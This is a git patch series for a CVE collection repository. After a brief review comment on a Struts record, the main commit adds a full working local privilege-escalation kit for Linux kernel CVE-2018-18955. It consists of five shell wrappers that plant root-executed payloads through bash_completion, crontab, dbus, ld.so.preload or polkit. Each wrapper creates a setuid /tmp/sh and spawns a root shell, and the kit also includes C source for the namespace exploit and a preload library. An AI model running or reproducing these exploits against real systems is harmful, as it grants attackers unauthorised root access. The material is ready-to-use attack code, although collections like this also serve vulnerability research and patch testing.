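Review bot: `scope-of-influence` lists only `Struts 2.3.1 - Struts 2.3.34`, while the `description` a few lines above states that 2.5 through 2.5.16 is affected as well, so any consumer that reads the scope field alone will miss every 2.5.x deployment. Make the two fields agree, e.g. `scope-of-influence: Struts 2.3 - 2.3.34, Struts 2.5 - 2.5.16`. The `name` field also carries a product description rather than the vulnerability's name; something like `Apache Struts 2 namespace OGNL injection (S2-057)` is what a listing built from these records would need.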
+++ b/other_list.yaml @@ -33,6 +33,8 @@ cve: - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 + apache-Struts: + - CVE-2018-11776 unzip: - CVE-2022-0529 django: From b67d7a497c6d7937fb46da3180157815efe78d1a Mon Sep 17 00:00:00 2001 From: guanzhenyu Date: Fri, 7 Apr 2023 16:55:54 +0800 Subject: [PATCH 010/109] Add CVE-2018-18955 --- .../2018/CVE-2018-18955/README.md | 29 ++ .../CVE-2018-18955/exploit.bash_completion.sh | 103 ++++++ .../2018/CVE-2018-18955/exploit.cron.sh | 118 +++++++ .../2018/CVE-2018-18955/exploit.dbus.sh | 162 +++++++++ .../2018/CVE-2018-18955/exploit.ldpreload.sh | 110 ++++++ .../2018/CVE-2018-18955/exploit.polkit.sh | 134 ++++++++ .../2018/CVE-2018-18955/libsubuid.c | 14 + .../2018/CVE-2018-18955/rootshell.c | 9 + .../2018/CVE-2018-18955/subshell.c | 98 ++++++ .../2018/CVE-2018-18955/subuid_shell.c | 322 ++++++++++++++++++ .../2018/yaml/CVE-2018-18955.yaml | 19 ++ openkylin_list.yaml | 1 + 12 files changed, 1119 insertions(+) create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/README.md create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh create mode 100755 cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/rootshell.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/subshell.c create mode 100644 cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c create mode 100644 cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml diff --git a/cve/linux-kernel/2018/CVE-2018-18955/README.md b/cve/linux-kernel/2018/CVE-2018-18955/README.md new file mode 100644 index 00000000..5564e46a --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/README.md @@ -0,0 +1,29 @@ +

CVE-2018-18955

+ +Linux local root exploit. + +Wrapper for Jann Horn's +[exploit](https://bugs.chromium.org/p/project-zero/issues/detail?id=1712) for +[CVE-2018-18955](https://nvd.nist.gov/vuln/detail/CVE-2018-18955), forked from +[kernel-exploits](https://github.com/bcoles/kernel-exploits). + +In the Linux kernel 4.15.x through 4.19.x before 4.19.2, `map_write()` +in `kernel/user_namespace.c` allows privilege escalation because it +mishandles nested user namespaces with more than 5 UID or GID ranges. A +user who has `CAP_SYS_ADMIN` in an affected user namespace can bypass +access controls on resources outside the namespace, as demonstrated by +reading `/etc/shadow`. This occurs because an ID transformation takes +place properly for the namespaced-to-kernel direction but not for the +kernel-to-namespaced direction. + +### Usage + +Simply run one of the shell +scripts depending on the targeted exploitation technique. + +### Disclaimer + +Running unathorized attacks to public or private servers is illegal. The +content of this repository is for educational purposes only and no +responsibility will be taken by the authors in case of ill use of the +provided material. diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh new file mode 100755 index 00000000..0d2c16a2 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.bash_completion.sh 
@@ -0,0 +1,103 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses bash_completion technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.bash_completion.sh +# [*] Compiling... +# [*] Writing payload to /etc/bash_completion.d/subuid ... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Waiting for root user to login ... +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Oct 4 13:46 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +bootstrap="/etc/bash_completion.d/subuid" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? 
-ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Writing payload to /etc/bash_completion.d/subuid ..." + +echo "echo 'if [[ \$EUID -ne 0 ]]; then exit; fi; /bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}; /bin/rm ${bootstrap}' > ${bootstrap}" | ./subuid_shell ./subshell + +echo "[*] Waiting for root user to login ..." +while [ ! -u "${rootshell}" ]; +do + sleep 15; +done + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh new file mode 100755 index 00000000..da879779 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.cron.sh 
@@ -0,0 +1,118 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses crontab technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.cron.sh +# [*] Compiling... +# [*] Writing payload to /tmp/payload... +# [*] Adding cron job... (wait a minute) +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Nov 21 19:47 /tmp/sh +# [*] Cleaning up... +# [!] Remember to clean up /etc/crontab +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +bootstrap="/tmp/payload" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Writing payload to ${bootstrap}..." 
+ +echo "#!/bin/sh\n/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" > $bootstrap +/bin/chmod +x "${bootstrap}" + +echo "[*] Adding cron job... (wait a minute)" + +echo "echo '* * * * * root ${bootstrap}' >> /etc/crontab" | ./subuid_shell ./subshell +sleep 60 + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + /bin/rm "${bootstrap}" + exit 1 +fi + +echo '[+] Success:' +ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm "${bootstrap}" +/bin/rm subuid_shell +/bin/rm subshell + +if command_exists /bin/sed; then + echo "/bin/sed -i '\$ d' /etc/crontab" | $rootshell +else + echo "[!] Manual clean up of /etc/crontab required" +fi + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh new file mode 100755 index 00000000..75b678da --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.dbus.sh 
@@ -0,0 +1,162 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses dbus service technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.dbus.sh +# [*] Compiling... +# [*] Creating /usr/share/dbus-1/system-services/org.subuid.Service.service... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Creating /etc/dbus-1/system.d/org.subuid.Service.conf... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Launching dbus service... +# Error org.freedesktop.DBus.Error.NoReply: Did not receive a reply. Possible causes include: the remote application did not send a reply, the message bus security policy blocked the reply, the reply timeout expired, or the network connection was broken. +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Jan 4 18:31 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +service="org.subuid.Service" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/dbus-send; then + echo '[-] dbus-send is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! 
gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Creating /usr/share/dbus-1/system-services/${service}.service..." + +cat << EOF > "${service}.service" +[D-BUS Service] +Name=${service} +Exec=/bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" +User=root +EOF + +echo "cp ${service}.service /usr/share/dbus-1/system-services/${service}.service" | ./subuid_shell ./subshell + +if ! test -r "/usr/share/dbus-1/system-services/${service}.service"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Creating /etc/dbus-1/system.d/${service}.conf..." + +cat << EOF > "${service}.conf" + + + + + + +EOF + +echo "cp ${service}.conf /etc/dbus-1/system.d/${service}.conf" | ./subuid_shell ./subshell + +if ! test -r "/etc/dbus-1/system.d/${service}.conf"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Launching dbus service..." + +/usr/bin/dbus-send --system --print-reply --dest="${service}" --type=method_call --reply-timeout=1 / "${service}" + +sleep 1 + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' 
+/bin/rm subuid_shell +/bin/rm subshell +/bin/rm "${service}.conf" +/bin/rm "${service}.service" +echo "/bin/rm /usr/share/dbus-1/system-services/${service}.service" | $rootshell +echo "/bin/rm /etc/dbus-1/system.d/${service}.conf" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh new file mode 100755 index 00000000..79be6a62 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.ldpreload.sh 
@@ -0,0 +1,110 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses ld.so.preload technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.ldpreload.sh +# [*] Compiling... +# [*] Adding libsubuid.so to /etc/ld.so.preload... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Nov 21 19:07 /tmp/sh +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +lib="libsubuid.so" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? -ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +if ! 
gcc libsubuid.c -fPIC -shared -o "${lib}"; then + echo 'Compiling libsubuid.c failed' + echo 'Using precompiled shared library' + cp bin/libsubuid "${lib}" +fi + +echo "[*] Adding ${lib} to /etc/ld.so.preload..." + +echo "cp ${lib} /lib/; echo /lib/${lib} > /etc/ld.so.preload" | ./subuid_shell ./subshell + +/usr/bin/newuidmap + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell +echo "/bin/rm /lib/${lib}" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh b/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh new file mode 100755 index 00000000..ad0e27ce --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/exploit.polkit.sh 
@@ -0,0 +1,134 @@ +#!/bin/sh +# wrapper for Jann Horn's exploit for CVE-2018-18955 +# uses polkit technique +# --- +# test@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955$ ./exploit.polkit.sh +# [*] Compiling... +# [*] Creating /usr/share/polkit-1/actions/subuid.policy... +# [.] starting +# [.] setting up namespace +# [~] done, namespace sandbox set up +# [.] mapping subordinate ids +# [.] subuid: 165536 +# [.] subgid: 165536 +# [~] done, mapped subordinate ids +# [.] executing subshell +# [*] Launching pkexec... +# [+] Success: +# -rwsrwxr-x 1 root root 8384 Dec 29 14:22 /tmp/sh +# [*] Cleaning up... +# [*] Launching root shell: /tmp/sh +# root@linux-mint-19-2:~/kernel-exploits/CVE-2018-18955# id +# uid=0(root) gid=0(root) groups=0(root),1001(test) + +rootshell="/tmp/sh" +policy="subuid.policy" + +command_exists() { + command -v "${1}" >/dev/null 2>/dev/null +} + +if ! command_exists /usr/bin/pkexec; then + echo '[-] pkexec is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newuidmap; then + echo '[-] newuidmap is not installed' + exit 1 +fi + +if ! command_exists /usr/bin/newgidmap; then + echo '[-] newgidmap is not installed' + exit 1 +fi + +if ! test -w .; then + echo '[-] working directory is not writable' + exit 1 +fi + +echo "[*] Compiling..." + +if ! gcc subuid_shell.c -o subuid_shell; then + echo 'Compiling subuid_shell.c failed' + echo 'Using precompiled binary' + cp bin/subuid_shell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc subshell.c -o subshell; then + echo 'Compiling gcc_subshell.c failed' + echo 'Using precompiled binary' + cp bin/subshell . + + if [ $? -ne 0 ] + then + echo "Could not copy precompiled binary" + exit 1 + fi +fi + +if ! gcc rootshell.c -o "${rootshell}"; then + echo 'Compiling rootshell.c failed' + echo 'Using precompiled binary' + cp bin/rootshell "${rootshell}" + + if [ $? 
-ne 0 ] + then + echo "Could not copy rootshell to '${rootshell}'" + exit 1 + fi +fi + +echo "[*] Creating /usr/share/polkit-1/actions/${policy}..." + +echo ' + + + + + yes + yes + yes + + +' > "${policy}" + +echo "cp ${policy} /usr/share/polkit-1/actions/${policy}" | ./subuid_shell ./subshell + +if ! test -r "/usr/share/polkit-1/actions/${policy}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo "[*] Launching pkexec..." + +/usr/bin/pkexec --disable-internal-agent 2>/dev/null /bin/sh -c "/bin/chown root:root ${rootshell};/bin/chmod u+s ${rootshell}" + +if ! test -u "${rootshell}"; then + echo '[-] Failed' + /bin/rm "${rootshell}" + exit 1 +fi + +echo '[+] Success:' +/bin/ls -la "${rootshell}" + +echo '[*] Cleaning up...' +/bin/rm subuid_shell +/bin/rm subshell +/bin/rm "${policy}" +echo "/bin/rm /usr/share/polkit-1/actions/${policy}" | $rootshell + +echo "[*] Launching root shell: ${rootshell}" +$rootshell + diff --git a/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c b/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c new file mode 100644 index 00000000..4c6e1f1f --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/libsubuid.c @@ -0,0 +1,14 @@ +#include +#include +#include + +void init(void) __attribute__((constructor)); + +void __attribute__((constructor)) init() { + setuid(0); + setgid(0); + unlink("/etc/ld.so.preload"); + system("chown root:root /tmp/sh"); + system("chmod u+s /tmp/sh"); + _exit(0); +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c b/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c new file mode 100644 index 00000000..2628d491 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/rootshell.c @@ -0,0 +1,9 @@ +#include +#include +#include + +int main(void) { + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/subshell.c b/cve/linux-kernel/2018/CVE-2018-18955/subshell.c new file mode 100644 index 00000000..c4654292 --- /dev/null 
+++ b/cve/linux-kernel/2018/CVE-2018-18955/subshell.c @@ -0,0 +1,98 @@ +// subshell.c +// author: Jann Horn +// source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 + +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int main() { + int sync_pipe[2]; + char dummy; + + if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) { + err(1, "pipe"); + } + + pid_t child = fork(); + + if (child == -1) { + err(1, "fork"); + } + + if (child == 0) { + close(sync_pipe[1]); + + if (unshare(CLONE_NEWUSER)) { + err(1, "unshare userns"); + } + + if (write(sync_pipe[0], "X", 1) != 1) { + err(1, "write to sock"); + } + + if (read(sync_pipe[0], &dummy, 1) != 1) { + err(1, "read from sock"); + } + + execl("/bin/bash", "bash", NULL); + err(1, "exec"); + } + + close(sync_pipe[0]); + + if (read(sync_pipe[1], &dummy, 1) != 1) { + err(1, "read from sock"); + } + + char pbuf[100]; + sprintf(pbuf, "/proc/%d", (int)child); + + if (chdir(pbuf)) { + err(1, "chdir"); + } + + const char *id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n"; + int uid_map = open("uid_map", O_WRONLY); + + if (uid_map == -1) { + err(1, "open uid map"); + } + + if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) { + err(1, "write uid map"); + } + + close(uid_map); + + int gid_map = open("gid_map", O_WRONLY); + + if (gid_map == -1) { + err(1, "open gid map"); + } + + if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) { + err(1, "write gid map"); + } + + close(gid_map); + + if (write(sync_pipe[1], "X", 1) != 1) { + err(1, "write to sock"); + } + + int status; + + if (wait(&status) != child) { + err(1, "wait"); + } + + return 0; +} diff --git a/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c b/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c new file mode 100644 index 00000000..21d63893 --- /dev/null +++ b/cve/linux-kernel/2018/CVE-2018-18955/subuid_shell.c 
@@ -0,0 +1,322 @@ +// subuid_shell.c - Linux local root exploit for CVE-2018-18955 +// Exploits broken uid/gid mapping in nested user namespaces. +// --- +// Mostly stolen from Jann Horn's exploit: +// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1712 +// Some code stolen from Xairy's exploits: +// - https://github.com/xairy/kernel-exploits +// --- +// +// - added auto subordinate id mapping +// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-18955 + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define DEBUG + +#ifdef DEBUG +# define dprintf printf +#else +# define dprintf +#endif + +char* SUBSHELL = "./subshell"; + + +// * * * * * * * * * * * * * * * * * File I/O * * * * * * * * * * * * * * * * * + +#define CHUNK_SIZE 1024 + +int read_file( + const char* file, + char* buffer, + int max_length +) { + int f = open(file, O_RDONLY); + + if (f == -1) { + return -1; + } + + int bytes_read = 0; + + while (1) { + int bytes_to_read = CHUNK_SIZE; + + if (bytes_to_read > max_length - bytes_read) { + bytes_to_read = max_length - bytes_read; + } + + int rv = read(f, &buffer[bytes_read], bytes_to_read); + + if (rv == -1) { + return -1; + } + + bytes_read += rv; + + if (rv == 0) { + return bytes_read; + } + } +} + +static int write_file( + const char* file, + const char* what, + ... 
+) { + char buf[1024]; + va_list args; + + va_start(args, what); + vsnprintf(buf, sizeof(buf), what, args); + va_end(args); + + buf[sizeof(buf) - 1] = 0; + + int len = strlen(buf); + int fd = open(file, O_WRONLY | O_CLOEXEC); + + if (fd == -1) { + return -1; + } + + if (write(fd, buf, len) != len) { + close(fd); + return -1; + } + + close(fd); + return 0; +} + + +// * * * * * * * * * * * * * * * * * Map * * * * * * * * * * * * * * * * * + +int get_subuid( + char* output, + int max_length +) { + char buffer[1024]; + char* path = "/etc/subuid"; + int length = read_file(path, &buffer[0], sizeof(buffer)); + + if (length == -1) { + return -1; + } + + int real_uid = getuid(); + struct passwd *u = getpwuid(real_uid); + + char needle[1024]; + + sprintf(needle, "%s:", u->pw_name); + + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + + if (found == NULL) { + return -1; + } + + for (int i = 0; found[needle_length + i] != ':'; i++) { + if ( + i >= max_length + || ((found - &buffer[0]) + needle_length + i >= length) + ) { + return -1; + } + + output[i] = found[needle_length + i]; + } + + return 0; +} + +int get_subgid( + char* output, + int max_length +) { + char buffer[1024]; + char* path = "/etc/subgid"; + int length = read_file(path, &buffer[0], sizeof(buffer)); + + if (length == -1) { + return -1; + } + + char needle[1024]; + int real_gid = getgid(); + struct group *g = getgrgid(real_gid); + + sprintf(needle, "%s:", g->gr_name); + + int needle_length = strlen(needle); + char* found = memmem(&buffer[0], length, needle, needle_length); + + if (found == NULL) { + return -1; + } + + for (int i = 0; found[needle_length + i] != ':'; i++) { + if ( + i >= max_length + || ((found - &buffer[0]) + needle_length + i >= length) + ) { + return -1; + } + + output[i] = found[needle_length + i]; + } + + return 0; +} + + +// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * + +int main(int argc, char** argv) { + 
if (argc > 1) { + SUBSHELL = argv[1]; + } + + dprintf("[.] starting\n"); + dprintf("[.] setting up namespace\n"); + + int sync_pipe[2]; + char dummy; + + if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) { + dprintf("[-] pipe\n"); + exit(EXIT_FAILURE); + } + + pid_t child = fork(); + + if (child == -1) { + dprintf("[-] fork"); + exit(EXIT_FAILURE); + } + + if (child == 0) { + prctl(PR_SET_PDEATHSIG, SIGKILL); + close(sync_pipe[1]); + + if (unshare(CLONE_NEWUSER) != 0) { + dprintf("[-] unshare(CLONE_NEWUSER)\n"); + exit(EXIT_FAILURE); + } + + if (unshare(CLONE_NEWNET) != 0) { + dprintf("[-] unshare(CLONE_NEWNET)\n"); + exit(EXIT_FAILURE); + } + + if (write(sync_pipe[0], "X", 1) != 1) { + dprintf("write to sock\n"); + exit(EXIT_FAILURE); + } + + if (read(sync_pipe[0], &dummy, 1) != 1) { + dprintf("[-] read from sock\n"); + exit(EXIT_FAILURE); + } + + if (setgid(0)) { + dprintf("[-] setgid"); + exit(EXIT_FAILURE); + } + + if (setuid(0)) { + printf("[-] setuid"); + exit(EXIT_FAILURE); + } + + execl(SUBSHELL, "", NULL); + dprintf("[-] executing subshell failed\n"); + } + + close(sync_pipe[0]); + + if (read(sync_pipe[1], &dummy, 1) != 1) { + dprintf("[-] read from sock\n"); + exit(EXIT_FAILURE); + } + + char path[256]; + + sprintf(path, "/proc/%d/setgroups", (int)child); + + if (write_file(path, "deny") == -1) { + dprintf("[-] denying setgroups failed\n"); + exit(EXIT_FAILURE); + } + + dprintf("[~] done, namespace sandbox set up\n"); + dprintf("[.] mapping subordinate ids\n"); + + char subuid[64]; + char subgid[64]; + + if (get_subuid(&subuid[0], sizeof(subuid))) { + dprintf("[-] couldn't find subuid map in /etc/subuid\n"); + exit(EXIT_FAILURE); + } + + if (get_subgid(&subgid[0], sizeof(subgid))) { + dprintf("[-] couldn't find subgid map in /etc/subgid\n"); + exit(EXIT_FAILURE); + } + + dprintf("[.] subuid: %s\n", subuid); + dprintf("[.] 
subgid: %s\n", subgid); + + char cmd[256]; + + sprintf(cmd, "newuidmap %d 0 %s 1000", (int)child, subuid); + + if (system(cmd)) { + dprintf("[-] newuidmap failed"); + exit(EXIT_FAILURE); + } + + sprintf(cmd, "newgidmap %d 0 %s 1000", (int)child, subgid); + + if (system(cmd)) { + dprintf("[-] newgidmap failed"); + exit(EXIT_FAILURE); + } + + dprintf("[~] done, mapped subordinate ids\n"); + dprintf("[.] executing subshell\n"); + + if (write(sync_pipe[1], "X", 1) != 1) { + dprintf("[-] write to sock"); + exit(EXIT_FAILURE); + } + + int status; + + if (wait(&status) != child) { + dprintf("[-] wait"); + exit(EXIT_FAILURE); + } + + return 0; +} diff --git a/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml b/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml new file mode 100644 index 00000000..d7231be5 --- /dev/null +++ b/cve/linux-kernel/2018/yaml/CVE-2018-18955.yaml @@ -0,0 +1,19 @@ +id: CVE-2018-18955 +source: https://github.com/scheatkode/CVE-2018-18955 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + 在Linux内核4.15.x至4.19.2之前,kernel/user_namespace.c中的map_write()允许权限升级,因为它错误地处理了有超过5个UID或GID范围的嵌套用户名称空间。在受影响的用户命名空间中拥有CAP_SYS_ADMIN的用户可以绕过对命名空间以外的资源的访问控制,如阅读/etc/shadow。出现这种情况是因为ID转换在命名空间到内核的方向上正确进行,但在内核到命名空间的方向上不正确。 + 